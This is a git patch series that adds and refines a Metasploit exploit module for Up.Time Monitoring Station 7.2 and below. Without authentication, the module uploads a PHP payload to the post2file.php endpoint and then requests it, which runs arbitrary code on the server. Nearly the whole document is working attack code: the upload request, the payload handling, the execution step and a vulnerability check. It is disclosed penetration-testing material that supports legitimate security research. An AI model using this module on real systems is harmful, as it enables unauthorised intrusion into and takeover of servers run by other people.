From cfffd80d22866222232d217f2ef4e1b7c804a979 Mon Sep 17 00:00:00 2001 From: DoI Date: Thu, 5 Dec 2013 11:56:05 +1300 Subject: [PATCH 1/5] Added uptime_file_upload exploit module --- .../exploits/linux/http/uptime_file_upload.rb | 96 +++++++++++++++++++ 1 file changed, 96 insertions(+) create mode 100644 modules/exploits/linux/http/uptime_file_upload.rb diff --git a/modules/exploits/linux/http/uptime_file_upload.rb b/modules/exploits/linux/http/uptime_file_upload.rb new file mode 100644 index 0000000000..44306f0f26 --- /dev/null +++ b/modules/exploits/linux/http/uptime_file_upload.rb @@ -0,0 +1,96 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::PhpEXE + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Up.Time Monitoring post2file.php Arbitrary File Upload', + 'Description' => %q{ + This module exploits an arbitrary file upload vulnerability found within the Up.Time monitoring server + 7.2 and below. A malicious entity can upload a PHP file into the webroot without authentication, leading + to arbitrary code execution. + }, + 'Author' => + [ + 'Denis Andzakovic ' # Vulnerability discoverey and MSF module + ], + 'License' => MSF_LICENSE, + 'References' => + [ + ['URL', 'http://www.security-assessment.com/files/documents/advisory/Up.Time%207.2%20-%20Arbitrary%20File%20Upload.pdf'] + ], + 'Payload' => + { + 'BadChars' => "\x00" + }, + 'Platform' => 'php', + 'Arch' => ARCH_PHP, + 'Targets' => + [ + [ 'Up.Time 7.2', { } ], + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Nov 19 2013')) + + register_options([ OptString.new('TARGETURI', [true, 'The full URI path to the Up.Time instance', '/']),], self.class) + end + + def check + uri = target_uri.path + + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(uri, 'wizards', 'post2file.php') + }) + + if not res or res.code != 200 + return Exploit::CheckCode::Unknown + end + + return Exploit::CheckCode::Appears + end + + def exploit + print_status("#{peer} - Uploading PHP to Up.Time server") + uri = target_uri.path + + peer = "#{rhost}:#{rport}" + @payload_name = "#{rand_text_alpha(5)}.php" + php_payload = get_write_exec_payload(:unlink_self=>true) + + data = Rex::MIME::Message.new + post_data = "file_name=#{@payload_name}&script=#{php_payload}" + + + print_status("#{peer} - Uploading payload #{@payload_name}") + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(uri, 'wizards', 'post2file.php'), + 'data' => post_data, + 'headers' => { + 'Content-Type' => 'application/x-www-form-urlencoded' + } + }) + if not res or res.code != 200 + fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed") + end + + print_status("#{peer} - Executing payload #{@payload_name}") + res = send_request_cgi({ + 'uri' => normalize_uri(uri, 'wizards', @payload_name), + 'method' => 'GET' + }) + end +end From 07294106cb78c090332752eec77ed47e62883b49 Mon Sep 17 00:00:00 2001 From: DoI Date: Thu, 5 Dec 2013 14:18:26 +1300 Subject: [PATCH 2/5] Removed redundant content-type parameter --- modules/exploits/linux/http/uptime_file_upload.rb | 3 --- 1 file changed, 3 deletions(-) diff --git a/modules/exploits/linux/http/uptime_file_upload.rb b/modules/exploits/linux/http/uptime_file_upload.rb index 44306f0f26..d5102a13ee 100644 --- a/modules/exploits/linux/http/uptime_file_upload.rb +++ b/modules/exploits/linux/http/uptime_file_upload.rb @@ -79,9 +79,6 @@ class Metasploit3 < Msf::Exploit::Remote 'method' => 'POST', 'uri' => normalize_uri(uri, 'wizards', 'post2file.php'), 'data' => post_data, - 'headers' => { - 'Content-Type' => 'application/x-www-form-urlencoded' - } }) if not res or res.code != 200 fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed") From 3d327363af41fe52f5f05f09594d0a1559195721 Mon Sep 17 00:00:00 2001 From: DoI Date: Fri, 6 Dec 2013 13:45:22 +1300 Subject: [PATCH 3/5] uptime_file_upload code tidy-ups --- .../exploits/linux/http/uptime_file_upload.rb | 25 +++++++++---------- 1 file changed, 12 insertions(+), 13 deletions(-) diff --git a/modules/exploits/linux/http/uptime_file_upload.rb b/modules/exploits/linux/http/uptime_file_upload.rb index d5102a13ee..2e60fb4eb3 100644 --- a/modules/exploits/linux/http/uptime_file_upload.rb +++ b/modules/exploits/linux/http/uptime_file_upload.rb @@ -1,8 +1,6 @@ ## -# This file is part of the Metasploit Framework and may be subject to -# redistribution and commercial restrictions. Please see the Metasploit -# Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework ## @@ -55,32 +53,33 @@ class Metasploit3 < Msf::Exploit::Remote 'uri' => normalize_uri(uri, 'wizards', 'post2file.php') }) - if not res or res.code != 200 - return Exploit::CheckCode::Unknown + if res and res.code == 200 + return Exploit::CheckCode::Appears end - return Exploit::CheckCode::Appears + return Exploit::CheckCode::Unknown + end def exploit print_status("#{peer} - Uploading PHP to Up.Time server") uri = target_uri.path - peer = "#{rhost}:#{rport}" @payload_name = "#{rand_text_alpha(5)}.php" php_payload = get_write_exec_payload(:unlink_self=>true) - data = Rex::MIME::Message.new - post_data = "file_name=#{@payload_name}&script=#{php_payload}" - + post_data = ({ + "file_name" => @payload_name, + "script" => php_payload + }) print_status("#{peer} - Uploading payload #{@payload_name}") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(uri, 'wizards', 'post2file.php'), - 'data' => post_data, + 'vars_post' => post_data, }) - if not res or res.code != 200 + unless res and res.code == 200 fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed") end From 2ff9c31747435f0d5be938c7f9be3411958f881e Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Fri, 6 Dec 2013 15:57:22 -0600 Subject: [PATCH 4/5] Do minor clean up on uptime_file_upload --- .../exploits/linux/http/uptime_file_upload.rb | 27 ++++++++++++------- 1 file changed, 17 insertions(+), 10 deletions(-) diff --git a/modules/exploits/linux/http/uptime_file_upload.rb b/modules/exploits/linux/http/uptime_file_upload.rb index 2e60fb4eb3..d8cffe813e 100644 --- a/modules/exploits/linux/http/uptime_file_upload.rb +++ b/modules/exploits/linux/http/uptime_file_upload.rb @@ -14,11 +14,11 @@ class Metasploit3 < Msf::Exploit::Remote def initialize(info = {}) super(update_info(info, - 'Name' => 'Up.Time Monitoring post2file.php Arbitrary File Upload', + 'Name' => 'Up.Time Monitoring Station post2file.php Arbitrary File Upload', 'Description' => %q{ - This module exploits an arbitrary file upload vulnerability found within the Up.Time monitoring server - 7.2 and below. A malicious entity can upload a PHP file into the webroot without authentication, leading - to arbitrary code execution. + This module exploits an arbitrary file upload vulnerability found within the Up.Time + monitoring server 7.2 and below. A malicious entity can upload a PHP file into the + webroot without authentication, leading to arbitrary code execution. }, 'Author' => [ @@ -27,11 +27,14 @@ class Metasploit3 < Msf::Exploit::Remote 'License' => MSF_LICENSE, 'References' => [ - ['URL', 'http://www.security-assessment.com/files/documents/advisory/Up.Time%207.2%20-%20Arbitrary%20File%20Upload.pdf'] + [ 'OSVDB', '100423' ], + [ 'BID', '64031'], + [ 'URL', 'http://www.security-assessment.com/files/documents/advisory/Up.Time%207.2%20-%20Arbitrary%20File%20Upload.pdf' ] ], 'Payload' => { - 'BadChars' => "\x00" + 'Space' => 10000, # just a big enough number to fit any PHP payload + 'DisableNops' => true }, 'Platform' => 'php', 'Arch' => ARCH_PHP, @@ -42,7 +45,10 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultTarget' => 0, 'DisclosureDate' => 'Nov 19 2013')) - register_options([ OptString.new('TARGETURI', [true, 'The full URI path to the Up.Time instance', '/']),], self.class) + register_options([ + OptString.new('TARGETURI', [true, 'The full URI path to the Up.Time instance', '/']), + Opt::RPORT(9999) + ], self.class) end def check @@ -53,7 +59,7 @@ class Metasploit3 < Msf::Exploit::Remote 'uri' => normalize_uri(uri, 'wizards', 'post2file.php') }) - if res and res.code == 200 + if res and res.code == 500 and res.body.to_s =~ /<\/title>/ return Exploit::CheckCode::Appears end @@ -66,7 +72,7 @@ class Metasploit3 < Msf::Exploit::Remote uri = target_uri.path @payload_name = "#{rand_text_alpha(5)}.php" - php_payload = get_write_exec_payload(:unlink_self=>true) + php_payload = get_write_exec_payload(:unlink_self => true) post_data = ({ "file_name" => @payload_name, @@ -79,7 +85,8 @@ class Metasploit3 < Msf::Exploit::Remote 'uri' => normalize_uri(uri, 'wizards', 'post2file.php'), 'vars_post' => post_data, }) - unless res and res.code == 200 + + unless res and res.code == 200 and res.body.to_s =~ /<title><\/title>/ fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed") end From 3729c536900ac695993c86ee7bd60aa8cbb39eb8 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan_vazquez@rapid7.com> Date: Fri, 6 Dec 2013 15:57:52 -0600 Subject: [PATCH 5/5] Move uptime_file_upload to the correct location --- modules/exploits/{linux => multi}/http/uptime_file_upload.rb | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename modules/exploits/{linux => multi}/http/uptime_file_upload.rb (100%) diff --git a/modules/exploits/linux/http/uptime_file_upload.rb b/modules/exploits/multi/http/uptime_file_upload.rb similarity index 100% rename from modules/exploits/linux/http/uptime_file_upload.rb rename to modules/exploits/multi/http/uptime_file_upload.rb